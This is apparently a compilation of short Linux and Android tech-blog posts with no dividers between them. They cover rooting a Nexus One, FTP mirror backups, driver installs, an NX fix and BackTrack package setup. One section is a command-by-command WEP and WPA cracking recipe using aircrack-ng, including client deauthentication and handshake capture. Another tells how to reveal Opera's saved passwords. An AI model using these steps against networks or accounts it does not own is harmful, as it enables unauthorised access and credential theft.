HydTech

The Nexus one was rooted before it even got released. Paul at modaco forums showed us how to perform this hack. I’ll try to simplify the method here.

1. First unlock your bootloader if you have a T-mobile Nexus One (this voids the warranty) or get an unlocked version from Google for like $550:

a. download fastboot
b. open terminal or command line and type
– Windows fastboot-windows oem unlock
– Mac ./fastboot-mac oem unlock
– Linux ./fastboot-linux oem unlock

2. Rewrite the Bootloader to obtain root privileges:

a. Download either SuperBoot or InsecureBoot and extract. (The difference is that with the insecure boot you won’t make any changes to the system and you would have to launch su manually)
b. Put the device in bootloader mode:
– Turn off the phone and restart holding the trackball.
c. Flash the bootloader:
– Windows = double click the windows bat file
– Mac = open terminal and cd to the directory containing the file. type
chmod +x install-superboot-mac.sh
./install-superboot-mac.sh
– Linux = open terminal and cd to the directory containing the file. type
chmod +x install-superboot-linux.sh
./install-superboot-linux.sh

Now you should have root!

Pic courtesy of Stericson.

Last time I backed up my website with rsync and ssh, but on my new host they disabled SSH. Rsync does not work over ftp. I do not want to do incremental backups with delta files like is done with rdiff-backup or duplicity. I need to have an exact mirror of my site. But remember that your sql databases won’t be backed up.

Curlftpfs is the key! In this tutorial I will show you how to backup from one server to a backup location which can be your hard drive, another web host, dropbox folder, Box.net via webdav, etc.

Download curlftpfs, rsync and ncftp:
sudo apt-get install curlftpfs ncftp rsync

make directories to mount your ftp server:
sudo mkdir /media/hydtechblog
sudo mkdir /media/hydtechbackupserver

edit fstab to mount the ftp servers using curlftpfs:
sudo gedit /etc/fstab

add the lines and modify them according to your server:
curlftpfs#username:password@hydtechblog.com /media/hydtechblog fuse rw,allow_other,uid=root 0 0
curlftpfs#username:password@hydtechbackupserver /media/hydtechbackupserver fuse rw,allow_other,uid=root 0 0

One thing to remember is that these two will not mount automatically because when the computer restarts, the fstab is done while you are not connected to the network. To fix this we can just add the mount commands in our crontab.

Edit crontab:
sudo crontab -e
enter the following lines and modify accordingly:
00 09 * * * mount /media/hydtechblog
00 09 * * * mount /media/hydtechbackup
01 09 * * * rsync -avz –rsync-path=/usr/bin/rsync /media/hydtechblog/public_html /media/hydtechbackup/public_html

ctrl + o to write and ctrl + x to save

This will tell cron to mount the folders at 9:00 am and start rsync at 9:01 am. You can replace the backup location to another folder on your hard drive or your dropbox or ubuntu one folder. You can also mount box.net with webdav and use this method.

For encrypted incremental backups checkout duplicity, it also works with webdav and ftp.

There are several utilities in Windows which reveal the opera wand password and I haven’t used windows in forever. The Opera wiki has a Power button which can help capture your password while logging in to the site. Click this link in Opera and it will install a button which you can drag to any panel. While on a page which requires a password, you can click on this new wand instead of your original wand.

Voila!

This guide is adapted from Kazalku’s guide on remote exploit forums. Thanks Kazalku.

Download this driver and transfer it with a USB or boot up into another OS on your multiboot and save it in the BT root folder from here.

Untar it:

tar -xvzf hybrid-portsrc-x86_32-v5_10_91_9-3.tar.gz

makefile:
make -C /lib/modules/`uname -r`/build M=`pwd`

Insert the modules:
modprobe ieee80211_crypt_tkip
insmod wl.ko

Now you should have the network Claimed. you can check by:
lshw -C network

Bring it up:
ifconfig eth1 up

To load the module upon boot:

cp wl.ko /lib/modules/`uname -r`/kernel/net/wireless
depmod -a
modprobe wl

Load the module at every startup:
kate /etc/modules

add the following and close the text editor:
ieee80211_crypt_tkip
wl

Load NetworkManager and Configure KnetworkManager:
Type NetworkManager in a konsole and configure the wireless at the bottom right.

Delete the files you created in the root folder now that you dont need them.

At first injection with the Intel pro wireless cards was impossible. Then came the ipwraw driver. Now, we no longer need the ipwraw as the iwl3945 card supports injection. Most linux distros now ship with this driver.

Follow these steps for a succesful WEP crack in Ubuntu:

download necessary files
sudo apt-get install aircrack-ng

place card in monitor mode
sudo airmon-ng start wlan0

test injection
sudo aireplay-ng -9 -e linksys -a 00:14:6C:7E:40:80 mon0
(0% means injection not working)

capture data and write to file called output
sudo airodump-ng -c 9 –bssid 00:14:6C:7E:40:80 -w output mon0

fake authentication
sudo aireplay-ng -1 0 -e linksys -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0

replay mode
sudo aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0

run aircrack
sudo aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap

For WPA cracking follow this:

monitor mode
sudo airmon-ng start wlan0

collect handshake
sudo airodump-ng -c 9 –bssid 00:14:6C:7E:40:80 -w psk mon0

deauth connected client
sudo aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

cracking
sudo aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

These are just refreshers. For more help check www.aircrack-ng.org

After upgrading to Jaunty, I never managed to successfully connect to my desktop using NX. I use a windows computer with nomachine nx client. I always got an error like this:

Info: Proxy running in client mode with pid '1728'
Session: Starting session at 'Sat Jan 12 16:34:05 2008'.
Warning: Connected to remote version 3.0.0 with local version 3.1.0
Info: Connection with remote proxy completed.
Warning: Unrecognized session type 'unix-desktop'. Assuming agent session.
Info: Using ADSL link parameters 512/24/1/0.
Info: Using cache parameters 4/4096KB/16384KB/16384KB.
Info: Using pack method 'adaptive-7' with session 'unix-gnome'.
Info: Using ZLIB data compression 1/1/32.
Info: Using ZLIB stream compression 4/4.
Info: No suitable cache file found.
Info: Forwarding X11 connections to display ':0'.
Info: Forwarding multimedia connections to port '6000'.
Info: Listening to font server connections on port '11000'.
Session: Session started at 'Sat Jan 12 16:58:19 2008'.
Info: Established X server connection.
Info: Using shared memory parameters 0/0K.
Session: Terminating session at 'Sat Jan 12 16:58:19 2008'.
Session: Session terminated at 'Sat Jan 12 16:58:19 2008'.

After hours of searching the web, I concluded the problem is with the ownership and permissions of the .Xauthority file. Here’s how I fixed it:
sudo chown hydtech /home/hydtech/.Xauthority
sudo chgrp hydtech /home/hydtech/.Xauthority

and delete:
sudo rm /home/hydtech/.Xauthority-l
sudo rm /home/hydtech/.Xauthority-c

Now it works like a charm.

Once BackTrack is installed on the harddrive, open the menu and goto K -> BackTrack -> Penetration -> Fast Track
type:
./fast-track.py -i

Enter the Fast-Track updates menu (1).
Update everything (9).

After the update finishes, select the Installation menu (8).
Install everything (8).
Go back to the Installation menu, select Install Slapt-Get (1)
Install Slapt-Get (2), then select update SlackWare (1).
Exit (10)

Now, you can use slapt-get to install packages from the slackware repositories. For example, if you want to install mozilla-thunderbird:
Make sure it exists in the repositories:
slapt-get --search thunderbird
if you find it, use the install parameter to install:
slapt-get --install mozilla-thunderbird-2.0.0.21-i686-1


you can also use the gui front-end for slapt-get, but it is broken by default in BT3. so let’s reinstall it:
slapt-get --install --reinstall gslapt